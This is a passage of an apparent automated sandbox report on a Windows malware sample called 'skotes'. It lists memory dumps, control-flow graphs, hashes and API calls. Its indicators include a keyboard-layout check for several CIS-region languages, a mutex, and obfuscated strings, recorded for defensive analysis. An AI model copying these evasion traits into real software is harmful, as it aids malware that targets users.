                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumOpenValue
                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                          • API String ID: 2571532894-3963862150
                                                          • Opcode ID: aa579711ae04163ad354b169290b4a110dd5d362d82e2c099fb818f58b3efd4a
                                                          • Instruction ID: c6717d9ca85fd3b4e3cd66321d42abed006be451720f2baf1327e4f7573782e8
                                                          • Opcode Fuzzy Hash: aa579711ae04163ad354b169290b4a110dd5d362d82e2c099fb818f58b3efd4a
                                                          • Instruction Fuzzy Hash: 3DB1BF7190026C9BDB24DB24CC89BEEB7B9AF15340F4402D9E108E72D1DB74AFA88F54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 768 be7d30-be7db2 call c140f0 772 be7db8-be7de0 call bf7a00 call be5c10 768->772 773 be8356-be8373 call bfcff1 768->773 780 be7de4-be7e06 call bf7a00 call be5c10 772->780 781 be7de2 772->781 786 be7e0a-be7e23 780->786 787 be7e08 780->787 781->780 790 be7e54-be7e7f 786->790 791 be7e25-be7e34 786->791 787->786 792 be7eb0-be7ed1 790->792 793 be7e81-be7e90 790->793 794 be7e4a-be7e51 call bfd663 791->794 795 be7e36-be7e44 791->795 798 be7ed7-be7edc 792->798 799 be7ed3-be7ed5 GetNativeSystemInfo 792->799 796 be7ea6-be7ead call bfd663 793->796 797 be7e92-be7ea0 793->797 794->790 795->794 800 be8374 call c16c6a 795->800 796->792 797->796 797->800 803 be7edd-be7ee6 798->803 799->803 810 be8379-be837f call c16c6a 800->810 808 be7ee8-be7eef 803->808 809 be7f04-be7f07 803->809 812 be7ef5-be7eff 808->812 813 be8351 808->813 814 be7f0d-be7f16 809->814 815 be82f7-be82fa 809->815 818 be834c 812->818 813->773 819 be7f18-be7f24 814->819 820 be7f29-be7f2c 814->820 815->813 816 be82fc-be8305 815->816 821 be832c-be832f 816->821 822 be8307-be830b 816->822 818->813 819->818 823 be82d4-be82d6 820->823 824 be7f32-be7f39 820->824 829 be833d-be8349 821->829 830 be8331-be833b 821->830 825 be830d-be8312 822->825 826 be8320-be832a 822->826 831 be82d8-be82e2 823->831 832 be82e4-be82e7 823->832 827 be7f3f-be7f9b call bf7a00 call be5c10 call bf7a00 call be5c10 call be5d50 824->827 828 be8019-be82bd call bf7a00 call be5c10 call bf7a00 call be5c10 call be5d50 call bf7a00 call be5c10 call be5730 call bf7a00 call be5c10 call bf7a00 call be5c10 call be5d50 call bf7a00 call be5c10 call be5730 call bf7a00 call be5c10 call bf7a00 call be5c10 call be5d50 call bf7a00 call be5c10 call be5730 call bf7a00 call be5c10 call bf7a00 call be5c10 call be5d50 call bf7a00 call be5c10 call be5730 824->828 825->826 833 be8314-be831e 825->833 826->813 854 be7fa0-be7fa7 827->854 868 be82c3-be82cc 828->868 829->818 830->813 831->818 832->813 836 be82e9-be82f5 832->836 833->813 836->818 856 be7fab-be7fcb call c18bbe 854->856 857 be7fa9 854->857 862 be7fcd-be7fdc 856->862 863 be8002-be8004 856->863 857->856 865 be7fde-be7fec 862->865 866 be7ff2-be7fff call bfd663 862->866 867 be800a-be8014 863->867 863->868 865->810 865->866 866->863 867->868 868->815 872 be82ce 868->872 872->823
                                                          APIs
                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE7ED3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoNativeSystem
                                                          • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                          • API String ID: 1721193555-3123340372
                                                          • Opcode ID: 041f59cbfc4406dac10b36b9a86e9f82f61c38fca4d822f340f22a413acf2413
                                                          • Instruction ID: 6fea353e328cfe1efe2f71d6cf97cd15b8f5d4a91666c5b980afbfdf458666b8
                                                          • Opcode Fuzzy Hash: 041f59cbfc4406dac10b36b9a86e9f82f61c38fca4d822f340f22a413acf2413
                                                          • Instruction Fuzzy Hash: 67E11770E00684ABCB24BB29CD5B7AD7BB1EB42714F9442D8E4196B3C2DF354E9587C2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1286 c226f2-c2271a call c22133 call c22191 1291 c22842-c2289e call c16c87 call c262ee 1286->1291 1292 c22720-c2272c call c22139 1286->1292 1304 c228a0-c228a6 1291->1304 1305 c228a8-c228ab 1291->1305 1292->1291 1297 c22732-c2273e call c22165 1292->1297 1297->1291 1303 c22744-c22765 call c1adf5 GetTimeZoneInformation 1297->1303 1316 c22820-c22841 call c2212d call c22121 call c22127 1303->1316 1317 c2276b-c2278c 1303->1317 1306 c228ee-c22900 1304->1306 1305->1306 1307 c228ad-c228bd call c1b04b 1305->1307 1311 c22902-c22905 1306->1311 1312 c22910 1306->1312 1320 c228c7-c228e0 call c262ee 1307->1320 1321 c228bf 1307->1321 1311->1312 1318 c22907-c2290e call c22517 1311->1318 1314 c22915-c2292a call c1adf5 call bfcff1 1312->1314 1315 c22910 call c226f2 1312->1315 1315->1314 1322 c22796-c2279d 1317->1322 1323 c2278e-c22793 1317->1323 1318->1314 1343 c228e2-c228e3 1320->1343 1344 c228e5-c228eb call c1adf5 1320->1344 1329 c228c0-c228c5 call c1adf5 1321->1329 1331 c227af-c227b1 1322->1331 1332 c2279f-c227a6 1322->1332 1323->1322 1347 c228ed 1329->1347 1333 c227b3-c227dc call c1ef17 call c1e926 1331->1333 1332->1331 1338 c227a8-c227ad 1332->1338 1353 c227ea-c227ec 1333->1353 1354 c227de-c227e1 1333->1354 1338->1333 1343->1329 1344->1347 1347->1306 1356 c227ee-c2280c call c1e926 1353->1356 1354->1353 1355 c227e3-c227e8 1354->1355 1355->1356 1359 c2281b-c2281e 1356->1359 1360 c2280e-c22811 1356->1360 1359->1316 1360->1359 1361 c22813-c22819 1360->1361 1361->1316
                                                          APIs
                                                          • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00C36758), ref: 00C2275C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationTimeZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 565725191-239921721
                                                          • Opcode ID: 58d91f773b72f406ae069621eb64c970843bbea5289642f819f52b129b341a32
                                                          • Instruction ID: 09ed2f8bba24ae54ef745da20b69706d6d61dd1070d92d487cc7b5ccc86ad32c
                                                          • Opcode Fuzzy Hash: 58d91f773b72f406ae069621eb64c970843bbea5289642f819f52b129b341a32
                                                          • Instruction Fuzzy Hash: A3510972900225BBDB20EF69EC41AAE77B8FF46310F104269E520E75E5E7709E419B51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1362 c16fb4-c16fe9 GetFileType 1363 c170a1-c170a4 1362->1363 1364 c16fef-c16ffa 1362->1364 1365 c170a6-c170a9 1363->1365 1366 c170cd-c170f5 1363->1366 1367 c1701c-c17038 call c140f0 GetFileInformationByHandle 1364->1367 1368 c16ffc-c1700d call c1732a 1364->1368 1365->1366 1369 c170ab-c170ad 1365->1369 1371 c17112-c17114 1366->1371 1372 c170f7-c1710a 1366->1372 1376 c170be-c170cb call c175c0 1367->1376 1381 c1703e-c17080 call c1727c call c17124 * 3 1367->1381 1383 c17013-c1701a 1368->1383 1384 c170ba-c170bc 1368->1384 1375 c170af-c170b4 call c175f6 1369->1375 1369->1376 1374 c17115-c17123 call bfcff1 1371->1374 1372->1371 1389 c1710c-c1710f 1372->1389 1375->1384 1376->1384 1398 c17085-c1709d call c17249 1381->1398 1383->1367 1384->1374 1389->1371 1398->1371 1401 c1709f 1398->1401 1401->1384
                                                          APIs
                                                          • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C16EE6), ref: 00C16FD6
                                                          • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00C17030
                                                          • __dosmaperr.LIBCMT ref: 00C170C5
                                                            • Part of subcall function 00C1732A: __dosmaperr.LIBCMT ref: 00C1735F
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$HandleInformationType
                                                          • String ID:
                                                          • API String ID: 2531987475-0
                                                          • Opcode ID: 5bb0a2f5f5fcfb6fe57c4ee716f8a7f1ec552352ff0469130fe60203429d130b
                                                          • Instruction ID: 2701f112c0790f080fe084a431cb29543ca11d0fd73c41f2bc535c753f4b2432
                                                          • Opcode Fuzzy Hash: 5bb0a2f5f5fcfb6fe57c4ee716f8a7f1ec552352ff0469130fe60203429d130b
                                                          • Instruction Fuzzy Hash: 5B416DB5904304ABDB24EFB5DC459EFB7F9EF8A300B10462DF856D3610E6309A84EB21

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1402 be9ba5-be9bc5 GetFileAttributesA 1405 be9bc7-be9bd3 1402->1405 1406 be9bf3-be9c0f 1402->1406 1409 be9be9-be9bf0 call bfd663 1405->1409 1410 be9bd5-be9be3 1405->1410 1407 be9c3d-be9c5c 1406->1407 1408 be9c11-be9c1d 1406->1408 1413 be9c5e-be9c6a 1407->1413 1414 be9c8a-bea916 call bf80c0 1407->1414 1411 be9c1f-be9c2d 1408->1411 1412 be9c33-be9c3a call bfd663 1408->1412 1409->1406 1410->1409 1415 bea91c 1410->1415 1411->1412 1411->1415 1412->1407 1421 be9c6c-be9c7a 1413->1421 1422 be9c80-be9c87 call bfd663 1413->1422 1417 bea953-bea987 Sleep CreateMutexA 1415->1417 1418 bea91c call c16c6a 1415->1418 1431 bea98e-bea994 1417->1431 1418->1417 1421->1415 1421->1422 1422->1414 1432 bea996-bea998 1431->1432 1433 bea9a7-bea9a8 1431->1433 1432->1433 1434 bea99a-bea9a5 1432->1434 1434->1433 1436 bea9a9-bea9b0 call c16629 1434->1436
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9BA8
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
